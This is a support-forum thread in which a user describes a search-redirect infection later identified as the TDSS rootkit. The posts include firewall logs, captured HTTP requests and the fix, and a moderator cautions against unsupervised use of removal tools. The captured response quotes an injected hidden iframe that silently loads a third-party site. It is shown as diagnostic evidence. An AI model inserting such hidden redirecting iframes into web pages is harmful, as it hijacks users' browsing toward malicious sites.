Jump to content

Recommended Posts

All, I seem to have the same issue. Malwarebytes' Antimalware is detecting svchost process attempting ip connects to when firefox is not running, and other ips when firefox is running.

Also, when I search in Bing search textbox or Firefox s Google search text box, in either Internet Explorer or Firefox,respectively, and I click on the search result, it goes to other sites other than the original link. I checked the network tool part of Firefox 4, and it shows routes in the next following log.

Malwarebytes' Malware did not detect it with version ~6879 today, nor did it detect anything when I tried a few days ago. I just updated to 6885 and trying again. A few days ago, I tried running ComboFix but it only deleted things in archive zip files and a java scheduler.

May you please help me too? Should I open a new topic?

Malwarebytes' Antimaleware log

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55264, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55265, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55266, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55267, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55268, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55269, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55270, Process: firefox.exe)

09:50:03 Diane IP-BLOCK (Type: outgoing, Port: 55271, Process: firefox.exe)

09:59:03 Diane IP-BLOCK (Type: outgoing, Port: 55399, Process: firefox.exe)

09:59:03 Diane IP-BLOCK (Type: outgoing, Port: 55400, Process: firefox.exe)

10:02:07 Diane IP-BLOCK (Type: outgoing, Port: 55422, Process: svchost.exe)

10:32:33 Diane IP-BLOCK (Type: outgoing, Port: 55591, Process: svchost.exe)

10:42:33 Diane IP-BLOCK (Type: outgoing, Port: 55602, Process: svchost.exe)

12:54:20 Diane IP-BLOCK (Type: outgoing, Port: 55735, Process: svchost.exe)

13:24:45 Diane IP-BLOCK (Type: outgoing, Port: 55765, Process: svchost.exe)

13:34:45 Diane IP-BLOCK (Type: outgoing, Port: 55777, Process: svchost.exe)

CLICKING ON TEXTpad download search result, when I had textpad download in search toolbar, spawns these HTTP requests:


[01:25:03.941] GET http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJg [HTTP/1.1 200 OK 34ms]

[01:25:03.994] GET http://www.textpad.com/download/ [HTTP/1.1 200 OK 135ms]

[01:25:04.166] GET http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0 [HTTP/1.1 200 OK 446ms]

[01:25:04.643] GET [undefined 11ms]

Request URL:


Request Method:


Status Code:

HTTP/1.1 200 OK

Request Headers


Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.7Accept-Encoding:gzip, deflateAccept-Language:en-us,en;q=0.5Connection:keep-aliveHost:www.textpad.comKeep-Alive:115Referer:http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJgUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Sent Cookie


Response Headers


Cache-Control:no-cache, no-store, must-revalidate




Expires:Fri, 01 Jan 1990 00:00:00 GMTPragma:no-cacheSet-Cookie:__utnc=1; expires=Sat, 18-Jun-2011 05:55:04 GMT

Response Body


<iframe src='http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0' style='visibility:hidden;'></iframe>

Link to post
Share on other sites

I fixed this virus by researching it and finding a legitimate solution here.

Anyone with symptoms that I describe above, you probably have this Google search redirect virus. It is known as the TDSS virus.

The cure solution is explained in this article.

It refers to a trusted TDSSKiller.zip that removes this known rootkit virus TDSSKiller. It was found on my OEM partition, not C drive or registry files.

The cure solution TDSSKiller.zip should detect this TDSS virus. Once executed, it shows the detected virus, with option to "Cure". Click the Cure button, to safely cure the virus. The article says not to delete or quarantine because it might be in valid Windows files.

Users, Best of luck!

Malwarebytes' reps - you probably could put the same type of removal procedure for this rootkit TDSS virus in your ComboFix software. That would be best of both worlds, right?


Link to post
Share on other sites

We do not recommend users run these tools without supervision.

DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision.

Doing so could make your pc inoperatible and could require a full reinstall of your OS, losing all your programs and data.

Same for TDSSKiller.

Note: if the Cure option is not there, please select 'Skip'.

The developers of Combofix and TDSSKiller are different parties.

Link to post
Share on other sites

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.